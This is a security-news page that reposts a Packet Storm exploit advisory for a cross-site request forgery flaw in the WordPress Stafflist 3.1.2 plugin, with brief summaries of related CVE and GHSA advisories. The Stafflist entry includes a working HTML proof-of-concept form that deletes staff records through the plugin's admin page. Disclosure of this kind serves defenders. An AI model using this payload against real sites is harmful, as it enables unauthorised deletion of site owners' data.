Security
Headlines
HeadlinesLatestCVEs

Headline

WordPress Stafflist 3.1.2 Cross Site Request Forgery

WordPress Stafflist plugin version 3.1.2 suffers from a cross site request forgery vulnerability.

Packet Storm
#csrf#vulnerability#wordpress#php#auth#firefox
# Exploit Title: WordPress Plugin stafflist 3.1.2 - CSRF (Authenticated)# Date: 05-02-2022# Exploit Author: Hassan Khan Yusufzai - Splint3r7# Vendor Homepage: https://wordpress.org/plugins/stafflist/# Version: 3.1.2# Tested on: Firefox# Contact me: h [at] spidersilk.com# Summary:A CSRF vulnerability exists in staff record remove functionality inWordPress Plugin Stafflist 3.1.2.This vulnerability allows an attacker to delete existing records bytriggring a CSRF html request, due to not validating wp_nouce token inthe request.# ExploitAs n authenticated user:<html>  <body>    <form action="http://localhost:10003/wp-admin/admin.php">      <input type="hidden" name="page" value="stafflist" />      <input type="hidden" name="remove" value="1" />      <input type="hidden" name="p" value="1" />      <input type="hidden" name="s" value="1" />      <input type="submit" value="Submit request" />    </form>  </body></html>

Related news

GHSA-773h-w45w-f2f9: Denial of service vulnerability exists in libxmljs

libxmljs provides libxml bindings for v8 javascript engine. This affects all versions of package libxmljs. When invoking the libxmljs.parseXml function with a non-buffer argument the V8 code will attempt invoking the .toString method of the argument. If the argument's toString value is not a Function object V8 will crash.

GHSA-7jvx-f994-rfw2: materialize-css vulnerable to cross-site Scripting (XSS) due to improper escape of user input

All versions of package materialize-css are vulnerable to Cross-site Scripting (XSS) due to improper escape of user input (such as &lt;not-a-tag /&gt;) that is being parsed as HTML/JavaScript, and inserted into the Document Object Model (DOM). This vulnerability can be exploited when the user-input is provided to the autocomplete component.

GHSA-5hjh-c26m-xw8w: ProxyScotch is vulnerable to a server-side Request Forgery (SSRF)

ProxyScotch is a simple proxy server created for hoppscotch.io. The package github.com/hoppscotch/proxyscotch before 1.0.0 are vulnerable to Server-side Request Forgery (SSRF) when interceptor mode is set to proxy. It occurs when an HTTP request is made by a backend server to an untrusted URL submitted by a user. It leads to a leakage of sensitive information from the server.

GHSA-m2h2-264f-f486: angular vulnerable to regular expression denial of service (ReDoS)

AngularJS lets users write client-side web applications. The package angular after 1.7.0 is vulnerable to Regular Expression Denial of Service (ReDoS) by providing a custom locale rule that makes it possible to assign the parameter in posPre: ' '.repeat() of NUMBER_FORMATS.PATTERNS[1].posPre with a very high value. **Note:** 1. This package has been deprecated and is no longer maintained. 2. The vulnerable versions are 1.7.0 and higher.

CVE-2022-29444: WordPress Breeze plugin <= 2.0.2 - Plugin Settings Change leading to Cross-Site Scripting (XSS) vulnerability - Patchstack

Plugin Settings Change leading to Cross-Site Scripting (XSS) vulnerability in Cloudways Breeze plugin <= 2.0.2 on WordPress allows users with a subscriber or higher user role to execute any of the wp_ajax_* actions in the class Breeze_Configuration which includes the ability to change any of the plugin's settings including CDN setting which could be further used for XSS attack.

CVE-2022-0191: Changeset 2705068 – WordPress Plugin Repository

The Ad Invalid Click Protector (AICP) WordPress plugin before 1.2.7 does not have CSRF check deleting banned users, which could allow attackers to make a logged in admin remove arbitrary bans

Packet Storm: Latest News

Siemens Energy Omnivise T3000 8.2 SP3 Privilege Escalation / File Download